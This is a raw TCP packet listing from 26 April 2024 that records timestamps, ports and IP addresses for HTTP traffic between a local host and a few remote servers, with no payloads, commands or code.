Apr 26, 2024 23:09:03.383898973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.383919954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383954048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.383963108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.383979082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384008884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384018898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.384042025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384079933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.384110928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384135962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384170055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.384186029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384198904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384211063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384229898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.384233952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384270906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.384325981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384340048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384356022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384373903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.384394884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384432077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.384454966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384468079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384499073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.384531021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384572029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384583950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384596109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.384603024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.384629965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.384633064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.385835886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.385873079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.385886908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.385934114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.385972977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.386338949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.386449099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.386462927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.386483908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.386523008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.386560917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.386583090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.386601925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.386615992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.386635065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.386976957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.386990070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387001991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387020111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.387034893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.387037039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387073994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387109041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387115002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.387175083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387188911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387202024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387213945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.387236118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.387253046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387310028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387322903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387334108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387342930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.387367010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387367964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.387428999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387460947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.387475967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387553930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387589931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.387615919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387629986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387654066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387660980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.387835979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.387871981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.387917042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.388010025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.388046980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.388083935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.388134956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.388170004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.388195992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.388247967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.388283014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.389014006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389081001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389116049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.389117956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389228106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389241934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389262915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.389316082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389350891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.389374971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389451981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389486074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.389503956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389606953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389638901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.389658928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389704943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389740944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.389744997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389873028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389904976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.389914989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.389976978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.390010118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.390014887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.390041113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.390079021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.390117884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.390197992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.390222073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.390242100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.390297890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.390338898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.390358925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.390403986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.390439034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.394840956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.403727055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.449836969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.533546925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.533606052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.533659935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.558990002 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.559045076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.595643997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.595674038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.595685959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.595760107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.638127089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.639874935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.639952898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.639965057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.639978886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640026093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.640085936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640098095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640113115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640136957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640149117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.640149117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640173912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640180111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.640192032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640213966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.640305996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640319109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640346050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.640417099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640429020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640461922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.640582085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640619993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.640655994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640723944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640737057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640758038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.640954971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640985012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.640993118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.641030073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.641043901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.641064882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.641100883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.641139030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.641139030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.641150951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.641163111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.641185045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.641187906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.641218901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.641231060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642049074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642086983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.642116070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642139912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642178059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.642204046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642261028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642287970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642297983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.642416000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642451048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.642586946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642635107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642672062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.642707109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642719030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642729998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642740965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642752886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.642777920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.642811060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642827034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642863035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.642916918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642929077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642963886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.642968893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642981052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.642992973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643013954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.643014908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643048048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.643147945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643182993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643197060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643217087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.643295050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643330097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.643338919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643352985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643388987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.643413067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643436909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643474102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.643510103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643522978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643558025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.643881083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643912077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.643949032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.644701958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.644715071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.644747972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.644769907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.645529032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.645553112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.645570040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.645592928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.645625114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.645688057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.645771027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.645807028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.645813942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.645873070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.645910025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.645929098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.646023035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.646056890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.646224976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.646255970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.646292925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.646302938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.646750927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.646785975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.646833897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.646936893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.646971941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.646996975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.647079945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.647115946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.647157907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.647202015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.647236109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.647260904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.647430897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.647458076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.647471905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.647609949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.647644043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.647649050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.647711992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.647747040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.647747040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648031950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648066044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.648091078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648165941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648206949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648225069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.648318052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648354053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648354053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.648725986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648766041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.648782969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648849010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648885965 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.648895025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648946047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.648978949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.648997068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.649041891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.649075031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.649100065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.649159908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.649197102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.649257898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.649271011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.649306059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.649498940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.649614096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.649646044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.650120974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650233984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650255919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650271893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.650285006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650326014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.650351048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650404930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650435925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.650513887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650527000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650537968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650559902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.650579929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650592089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650602102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650612116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.650616884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650644064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650646925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.650684118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.650883913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650914907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650927067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.650947094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651005030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651017904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651036978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.651050091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.651072979 CEST	80	49734	176.97.76.106	192.168.2.4
